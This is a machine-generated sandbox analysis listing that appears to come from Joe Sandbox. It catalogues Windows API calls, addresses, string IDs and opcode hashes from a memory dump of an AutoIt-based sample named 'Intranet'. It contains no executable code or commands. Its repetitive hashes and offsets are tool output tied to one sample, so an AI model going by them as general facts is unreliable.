                                                                            • Opcode ID: 006d6ca2713937da02e4ee624f8004046b7726a1db1cb316732e296da8e57348
                                                                            • Instruction ID: 3852beda0a8fff6e2feab3035c0113c2c9b79c296bb8bb98dee662ec5f5b1248
                                                                            • Opcode Fuzzy Hash: 006d6ca2713937da02e4ee624f8004046b7726a1db1cb316732e296da8e57348
                                                                            • Instruction Fuzzy Hash: 9B51AF70900609DFCF24CFA9C880AEEBBB0FF41315F14456AE85AD7340E738A996CB55
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 004AE01E
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 004AE037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: a8d34b159897069b4ccd3619f4c4173942460ae57f36be1fda52af22d4685f89
                                                                            • Instruction ID: b1b2f0c06b13e0c2905d67ee6daedb3b4185436929a6ce3a187e4680cff3f325
                                                                            • Opcode Fuzzy Hash: a8d34b159897069b4ccd3619f4c4173942460ae57f36be1fda52af22d4685f89
                                                                            • Instruction Fuzzy Hash: 935169714087449BE320AF11EC85BAFBBF8FBD5318F41484DF1D981191EBB49428CB1A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: AU3! ?S$EA06
                                                                            • API String ID: 4104443479-467422127
                                                                            • Opcode ID: 76d4603272076d58476398d4cc73d593f0c1baddf3039cd8ec3e315905bafb85
                                                                            • Instruction ID: 7ff9bc7179eccbbf2d4057ca04eb9898800f2192a11532f1db29b4c72400fef9
                                                                            • Opcode Fuzzy Hash: 76d4603272076d58476398d4cc73d593f0c1baddf3039cd8ec3e315905bafb85
                                                                            • Instruction Fuzzy Hash: D4418CA1A041586BDF219B7488517FF7FA58BC5314F58406BE982A7387C5388D8183FA
                                                                            APIs
                                                                              • Part of subcall function 004B4AB2: __fread_nolock.LIBCMT ref: 004B4AD0
                                                                            • _wcscmp.LIBCMT ref: 00509DE1
                                                                            • _wcscmp.LIBCMT ref: 00509DF4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: 7246834550a8ea03e129e682b42b50a1d72a536084b6c088fa84f9821db8b4df
                                                                            • Instruction ID: 2e2d41cf403e866a0149abf9f64785c2d315df87e2c0891d065433438d22d6ed
                                                                            • Opcode Fuzzy Hash: 7246834550a8ea03e129e682b42b50a1d72a536084b6c088fa84f9821db8b4df
                                                                            • Instruction Fuzzy Hash: FA412971A00209BADF20EAA1CC45FEF7BBDEF89714F00446AFA00A71C6D6759D0487A5
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00528186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0052819B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 149e63926fede492b416b5b198137c813d7eab4d405febf94e4076d7e76ddda5
                                                                            • Instruction ID: fc6e20db6773ef235a835d785f45be2df812186daebde85e9356ef53932e0f17
                                                                            • Opcode Fuzzy Hash: 149e63926fede492b416b5b198137c813d7eab4d405febf94e4076d7e76ddda5
                                                                            • Instruction Fuzzy Hash: DC413974A013199FDB14CFA8D885BEA7BB5FF09300F10046AE904EB391DB70A956DF90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00512C6A
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00512CA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: cad3742ea412d73da65d287718f799051c20f15a5899a5357d59598c8146f6ad
                                                                            • Instruction ID: 80eff4014ed413622bbcfa9bedce9d81fd8b53378b5f5b613fd9fb20e462e600
                                                                            • Opcode Fuzzy Hash: cad3742ea412d73da65d287718f799051c20f15a5899a5357d59598c8146f6ad
                                                                            • Instruction Fuzzy Hash: 20313971C00219ABDF41EFA1DC85EEEBFB9FF08304F10001AF915A6262EB755956DBA4
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0052713C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00527178
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: a57ccc9cebcb73a747bcc068052363181014034116751155965f23848731e40e
                                                                            • Instruction ID: f45892bdc0255e321c22619e25ffc1592c64251d846fd8df220973d4f883cd4f
                                                                            • Opcode Fuzzy Hash: a57ccc9cebcb73a747bcc068052363181014034116751155965f23848731e40e
                                                                            • Instruction Fuzzy Hash: 5D31CB71100218AEEB10DF78DC81AFB7BA9FF89724F00961DF9A587190DB30AC95DB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005030B8
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005030F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 3e640950496c5e682a36257bba27a61980cb0d959f150532a3e434cfe4af0696
                                                                            • Instruction ID: 6cc5d15af4a822350748204b95876a76b4fc617b71070724d686259ce5412e83
                                                                            • Opcode Fuzzy Hash: 3e640950496c5e682a36257bba27a61980cb0d959f150532a3e434cfe4af0696
                                                                            • Instruction Fuzzy Hash: CA31D031A04209ABEB248F59C885FAEBFBDFF09350F14401DED85A61E1E7709B44DB50
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 00514132
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: 8a10d6207a3f0f8e1e3121a502df78d4f0efce4230a64f79d1b15cfc7c7175e0
                                                                            • Instruction ID: f0e78064c5c26f172ac7a3cbce53c39f8839498794a3ba68a1438a4ad44f38a0
                                                                            • Opcode Fuzzy Hash: 8a10d6207a3f0f8e1e3121a502df78d4f0efce4230a64f79d1b15cfc7c7175e0
                                                                            • Instruction Fuzzy Hash: A221E170A4021CABDF00EFA1C8A5EEE7BB4BF54345F40045AF905A7282DB34A985CBB5
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?,?,?,Combobox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00526D86
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00526D91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: de3576a4f84793bc97adfc2133beca6241bdc44323cb468dff9effddca4866c4
                                                                            • Instruction ID: cd26bb442fd17ba7ffe4875d40d461c143d8835182107d7ab7e716e8afe79e76
                                                                            • Opcode Fuzzy Hash: de3576a4f84793bc97adfc2133beca6241bdc44323cb468dff9effddca4866c4
                                                                            • Instruction Fuzzy Hash: 8111907131021DAFEF118E54EC81EAB3F6AFF99364F104129F9149B2D1D6719C509BA0
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • GetWindowRect.USER32(00000000,?,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00527296
                                                                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 005272B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 683416bae15c1adadbaf76a6b28e20341fbf6d2ee39b132205026cac0ea525a5
                                                                            • Instruction ID: 986f93a8a2a3fd4b7a427ee5b2edbd5094b0c34fd9eb6f7c7b0958a067b27070
                                                                            • Opcode Fuzzy Hash: 683416bae15c1adadbaf76a6b28e20341fbf6d2ee39b132205026cac0ea525a5
                                                                            • Instruction Fuzzy Hash: A021447261421AAFDB04DFA8DC46AFA7BA8FF19304F015618FD55E3291E734E8509B60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004F032B
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 004F0375
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 004C09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004C09E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X
                                                                            • API String ID: 3777226403-3081909835
                                                                            • Opcode ID: 525ebe7d5e61a01a7481c8cf217e9a200baca3dd24b8d82ca28aff1a505fdaec
                                                                            • Instruction ID: 021fe65c039bb2ecb3d935c1344a9a83fa02dd96c9f55a4532ce18375ab18d13
                                                                            • Opcode Fuzzy Hash: 525ebe7d5e61a01a7481c8cf217e9a200baca3dd24b8d82ca28aff1a505fdaec
                                                                            • Instruction Fuzzy Hash: D1218175A002989BCB41DF99C855BEE7BFCAF49305F00405FE804A7241DBB85A8DDFA5
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00526FC7
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00526FD6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: 62d522abb146dc3c9ec7a308f025f4f74719ec3411f25354d7e7bd2fa5dd042e
                                                                            • Instruction ID: 4a955baf077590609a33aeb8480183dea01755e919ee42ba1890c55db28394b5
                                                                            • Opcode Fuzzy Hash: 62d522abb146dc3c9ec7a308f025f4f74719ec3411f25354d7e7bd2fa5dd042e
                                                                            • Instruction Fuzzy Hash: 9D116A71100219ABEF118E64BE94EAB3F6AFF16368F105714F974931E4C775DC90AB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005031C9
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005031E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: cbaab2afa9128fef3a6cc8c7bb15360d82c4945bed73343675a0497cf5743765
                                                                            • Instruction ID: 21ee4263d085f59faf3425f759f85b85c599fc813e8662bc280f94cedaa853dd
                                                                            • Opcode Fuzzy Hash: cbaab2afa9128fef3a6cc8c7bb15360d82c4945bed73343675a0497cf5743765
                                                                            • Instruction Fuzzy Hash: 3211D035900219ABDB20DE9CDC46B9DBBBCBF0D314F144166E80AA72E0D770AF09DB91
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0051202F,?,?,?), ref: 005128F8
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00512921
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: a6b0834a6313aa26d8c085c7e56a2aee88735d6b4438545cd06c308e2faa20e7
                                                                            • Instruction ID: ba00d9a376a4f3b9e0e6991fbcf8d3fcae34a00a6a4af7ea3a52e2ef557d6704
                                                                            • Opcode Fuzzy Hash: a6b0834a6313aa26d8c085c7e56a2aee88735d6b4438545cd06c308e2faa20e7
                                                                            • Instruction Fuzzy Hash: 75119E70501325BAFB298E558C89EFABFACFF15751F10852AF94596140E37068E4EAE0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp
                                                                            • String ID: 0.0.0.0$L,S
                                                                            • API String ID: 856254489-2043881370
                                                                            • Opcode ID: 0c6ab3ac47d571e13e784fc2c81b304d57ea7841387cdde842362bc0102d58d6
                                                                            • Instruction ID: d08b9cb50bd38629545bb4caebefa585513e4892e8e6c61b958c9a4eb14e51de
                                                                            • Opcode Fuzzy Hash: 0c6ab3ac47d571e13e784fc2c81b304d57ea7841387cdde842362bc0102d58d6
                                                                            • Instruction Fuzzy Hash: 8C11B2356002049FCB04EE55C981EADBBB5BF95714F10C45EF9096B3A1CA74ED46CB64
                                                                            APIs
                                                                              • Part of subcall function 005186E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0051849D,?,00000000,?,?), ref: 005186F7
                                                                            • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
                                                                            • #9.WSOCK32(00000000,?,00000000), ref: 005184DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 626452242-2422070025
                                                                            • Opcode ID: 2ab6587d83da1d3ae5ae942861cbcd81797c36bdf32fdd3601f4cc697502a4b8
                                                                            • Instruction ID: 0f7f57209945bad71907b7652a6d481c09400cda4f25ab1102d7c350d11d898b
                                                                            • Opcode Fuzzy Hash: 2ab6587d83da1d3ae5ae942861cbcd81797c36bdf32fdd3601f4cc697502a4b8
                                                                            • Instruction Fuzzy Hash: F311C23010020AABEF20AF64C846FFEBB24FF00314F10451BEA15572D2DF71A854C659
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
